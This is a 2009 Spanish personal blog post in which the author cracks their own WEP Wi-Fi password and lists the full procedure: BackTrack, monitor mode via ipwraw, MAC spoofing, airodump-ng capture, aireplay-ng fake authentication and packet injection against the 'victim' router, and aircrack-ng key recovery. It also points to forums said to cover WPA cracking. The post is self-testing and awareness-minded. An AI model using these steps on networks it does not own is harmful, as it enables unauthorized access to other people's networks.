La seguridad WEP en Wifi

La verdad es que no me preocupa si alguien utiliza mi señal wifi (excepto si se ‘comiera’ mi ancho de banda y no me dejara navegar… o si entraran en mi router y me empezaran a cambiar datos de conexión / acceso). Hoy me ha dado por indagar la documentación que hay por la web para saber lo fácil o difícil que pueda ser descubrir mi contraseña wifi.

Después de leer durante unos 30-35 minutos encuentro varias páginas web y me dedico a seguir los pasos que recomiendan.

http://www.freewebs.com/thebyber/crackearwep.htm
http://foro.el-hacker.com/index.php/topic,169792.0.html
http://jafrancov.com/es/2009/07/rompiendo-wep-con-la-tarjeta-intel-3945/

El resultado ha sido que en apenas 10 minutos (y he ido lento para asegurarme que no me equivocaba) he hackeado mi propia red…. grrrrr….

Como decía, no me preocupa si alguien utiliza mi señal wifi… pero si me preocupa que sea tan sencillo que cualquiera pueda acceder a ella.
Tendré que ir pensando en cambiar la encriptación de la señal.

Básicamente he seguido los siguientes pasos:

1º Descargar el Backtrack 3 (http://www.remote-exploit.org/backtrack_download.html)

2º Grabarlo en un USBLIVE (usando UNetbootin). Encontré información sobre esta aplicación en
http://kanuz.wordpress.com/2009/02/08/guia-grabar-archivos-iso-en-memoria-usb-para-instalar-linux/
http://unetbootin.sourceforge.net/

3º Reiniciar el equipo con el USB (Yo voy a utilizar una placa de red Intel Pro Wireless 3945ABG tambien conocida como Ipw3945, que es la que tengo en mi portátil),
podremos verificar el tipo de tarjeta  con el siguiente comando:

lspci | grep Netowrk

4º Abrimos la consola en linux y escribimos:  iwconfig  (para ver las redes que tenemos)

5º Necesitamos activar Ipwraw (este paso es para las tarjetas Intel Pro Wireless 3945ABG), para que nuestra placa de red sirva para inyectar:

rmmod iwl3945
modprobe ipwraw

6º Ponemos iwconfig y veremos que la tarjeta se llama wifi0,en otras palabras,que la placa esta en modo monitor

7º  Ahora cambiaremos nuestra direccion mac:
airmon-ng stop wifi down
ifconfig wifi0 down

macchanger –m 00:11:22:33:44:55 wifi0

airmon-ng start wifi0

8º Después de cambiar nuestra dirección mac empezaremos a escanear las redes mas cercanas:

airodump-ng wifi0

9º Detenemos el escaneo anterior pulsando Ctrl+C , copiamos la dirección mac del router que rastrearemos y ahora lo que sigue será escanear la red que hayamos seleccionado

airodump-ng -c (canal de transmisión, columna CH) -w (nombre de un archivo de captura) –-bssid (MAC del router de red destino que copiamos) wifi0

10º Abrimos otra consola y lo que haremos es asociarnos con el router de la victima:

aireplay-ng -1 0 -a (MAC del router de la red destino que copiamos) -h 00:11:22:33:44:55 wifi0

11º Si nos sale que lo hemos logrado, colocamos el siguiente código para la inyección de paquetes, dando ” enter” nos preguntará si deseamos usar el paquete que nos muestra, presionamos la tecla ‘Y’ y damos enter, para que inicie el proceso:

aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b (MAC del router de red destino) -h 00:11:22:33:44:55 wifi0

12º Hecho todo lo anterior sólo nos resta esperar un poco a que el valor de la columna “#Data” comience a aumentar, pasados los 10,000 datos intercambiados abrimos una nueva ventana de consola y escribimos:

aircrack-ng (Nombre que dimos al archivo de captura)-01.cap

Automáticamente nos llevará a una pantalla donde prueba todas las posibles claves, si los datos de los paquetes inyectados no arrojaran una clave válida, nos indicará que intentemos pasados cada 5,000 IVs, que es lo mismo que el número de la columna ‘#Data’, pasados los 160,000 es 100% probable que obtengamos una clave WEP común de 64 bits hexadecimal,  cuando sea descubierta la clave nos lanzará un texto que dice “KEY FOUND! [Clave]“, ese número es la clave WEP que nos pide el router al intentar conectarnos.

Pero…

¿Y que ocurre si la encriptación es WPA?
Pues en esta URL http://foro.el-hacker.com/index.php/topic,169792.0.html también explican como hacerlo…

Conclusión… No es bueno preocuparse tanto de la seguridad de mi router wifi porque haga lo que haga mi router estará desprotegido…

Acerca de Nimoy

Apasionado por la aplicación de las nuevas tecnologías a nuestra actividad diaria con el objetivo de facilitar nuestra eficiencia profesional y personal.

Publicado el 2 septiembre, 2009 en Tecnología. Añade a favoritos el enlace permanente. Comentarios desactivados en La seguridad WEP en Wifi.

Los comentarios están cerrados.

A %d blogueros les gusta esto: